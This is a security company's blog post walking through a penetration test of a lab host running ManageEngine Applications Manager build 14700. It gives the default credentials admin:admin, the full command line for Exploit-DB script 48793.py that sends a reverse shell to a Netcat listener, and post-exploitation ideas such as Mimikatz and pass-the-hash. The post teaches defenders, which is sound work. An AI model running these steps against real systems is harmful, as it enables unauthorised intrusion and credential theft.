Ready to start a project with us? Let us know what's on your mind.

1501 Broadway STE 12060
New York, NY 10036-5601

inquiry@winmill.com
1-888-711-6455

    Select Service(s)*

    x Close

    WARNING

    • Blog articles related to hacking are only for informational and educational purposes. Any time the word “hacking” is used on this site, it shall be regarded as Ethical Hacking. You may try out these hacks on your own computer at your own risk. Performing hack attempts (without permission) on computers that you do not own is a serious crime under federal law.
    • Refer to the laws in your province/country before accessing, using, or in any other way utilizing these materials. These materials are foreducational and research purposes only.
    • Any actions and or activities relating to the material contained within this website is solely your responsibility. The misuse of the information in this website can result in criminal charges brought against the persons in question. The author and Winmill Software will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.

    In this pentest demonstration we show how easy it is to attack the Manage Engine web application, using the application’s default credentials and a remote code execution vulnerability. In minutes, we are able to obtain system-level access to the host machine. Conducting penetration tests regularly can reveal such vulnerabilities before they are exploited by troublemakers. 

    For this test, we are using a black box approach. We are only provided with an IP Address of 192.168.135.96 to conduct a penetration test of the target.

    We begin with an Nmap scan of the target using the NmapSI4 graphical user interface (see Figure 1).

    Figure 1: Nmap Scan Shows an HTTP Application Running on Port 40443. Interesting!

    Figure 1: Nmap Scan Shows an HTTP Application Running on Port 40443. Interesting!

    We could examine each open port and running service in search of an attack vector. But that would waste valuable time, which is always limited during a penetration test. Instead, we focus on the web application running on port 40443 as seen in the Nmap scan report. Navigating to the port with our web browser presents the ManageEngine Applications Manager web app, running Build No. 14700 (Figure 2).

    Figure 2: Manage Engine Applications Manager Build 14700

    Figure 2: Manage Engine Applications Manager Build 14700

    An EDB search for this version returns an Authenticated remote code execution (RCE) vulnerability (Figure 3). Knowing that this exploit requires credentials, we run a quick online search for “manageengine default credentials” and discover that the default credentials for this application are admin:admin, which we’ll include in the get_valid_cookie section of the exploit (Figure 3).

    Figure 3: Python Exploit 48793.py Affecting Build 14700

    Figure 3: Python Exploit 48793.py Affecting Build 14700

    We examine the 48793.py python exploit (Figure 4). We will use python3 48793.py http://192.168.135.96:40443/j_security_check admin admin 192.168.49.135 443 to launch the exploit, but first we set up a Netcat listener to catch our command shell on the target (Figure 5).

    Figure 4: Python Exploit 48793.py Exploit Database (EDB)

    Figure 4: Python Exploit 48793.py Exploit Database (EDB)

    Figure 5: Netcat Listening on Port 443

    Figure 5: Netcat Listening on Port 443

    We launch the exploit and watch our listener for the remote Windows command shell. (Figure 6)

    Figure 6: We launch the exploit and wait for our shell.

    Figure 6: We launch the exploit and wait for our shell.

    The exploit runs as expected and we are presented with an NT Authority System command shell. That’s fast. We’re in. We effectively own this Windows server! See Figure 7.

    Figure 7: We receive an NT Authority\system command shell in our target machine.

    Figure 7: We receive an NT Authority\system command shell in our target machine.

    At this point we have a foothold to begin the post-exploitation phase. We could create a local administrator account, enable a remote desktop protocol (RDP), and visit our system with a full desktop environment in search of sensitive information. We could also import other tools such as Impacket and Mimikatz to extract credential hashes to use in pass-the-hash attacks for lateral movement.

    This demonstration reveals the danger of using default credentials, even in web applications running on uncommon ports. In this case we were able to successfully exploit an authenticated remote code execution vulnerability in Manage Engine, which gave us full control of the underlying Windows OS. 

    Regular Penetration Testing can ensure that this and other exploitable vulnerabilities present in your current deployment are identified and mitigated or remediated as required to prevent a breach. Has anyone checked to make sure you’re not using default credentials on all your systems and applications?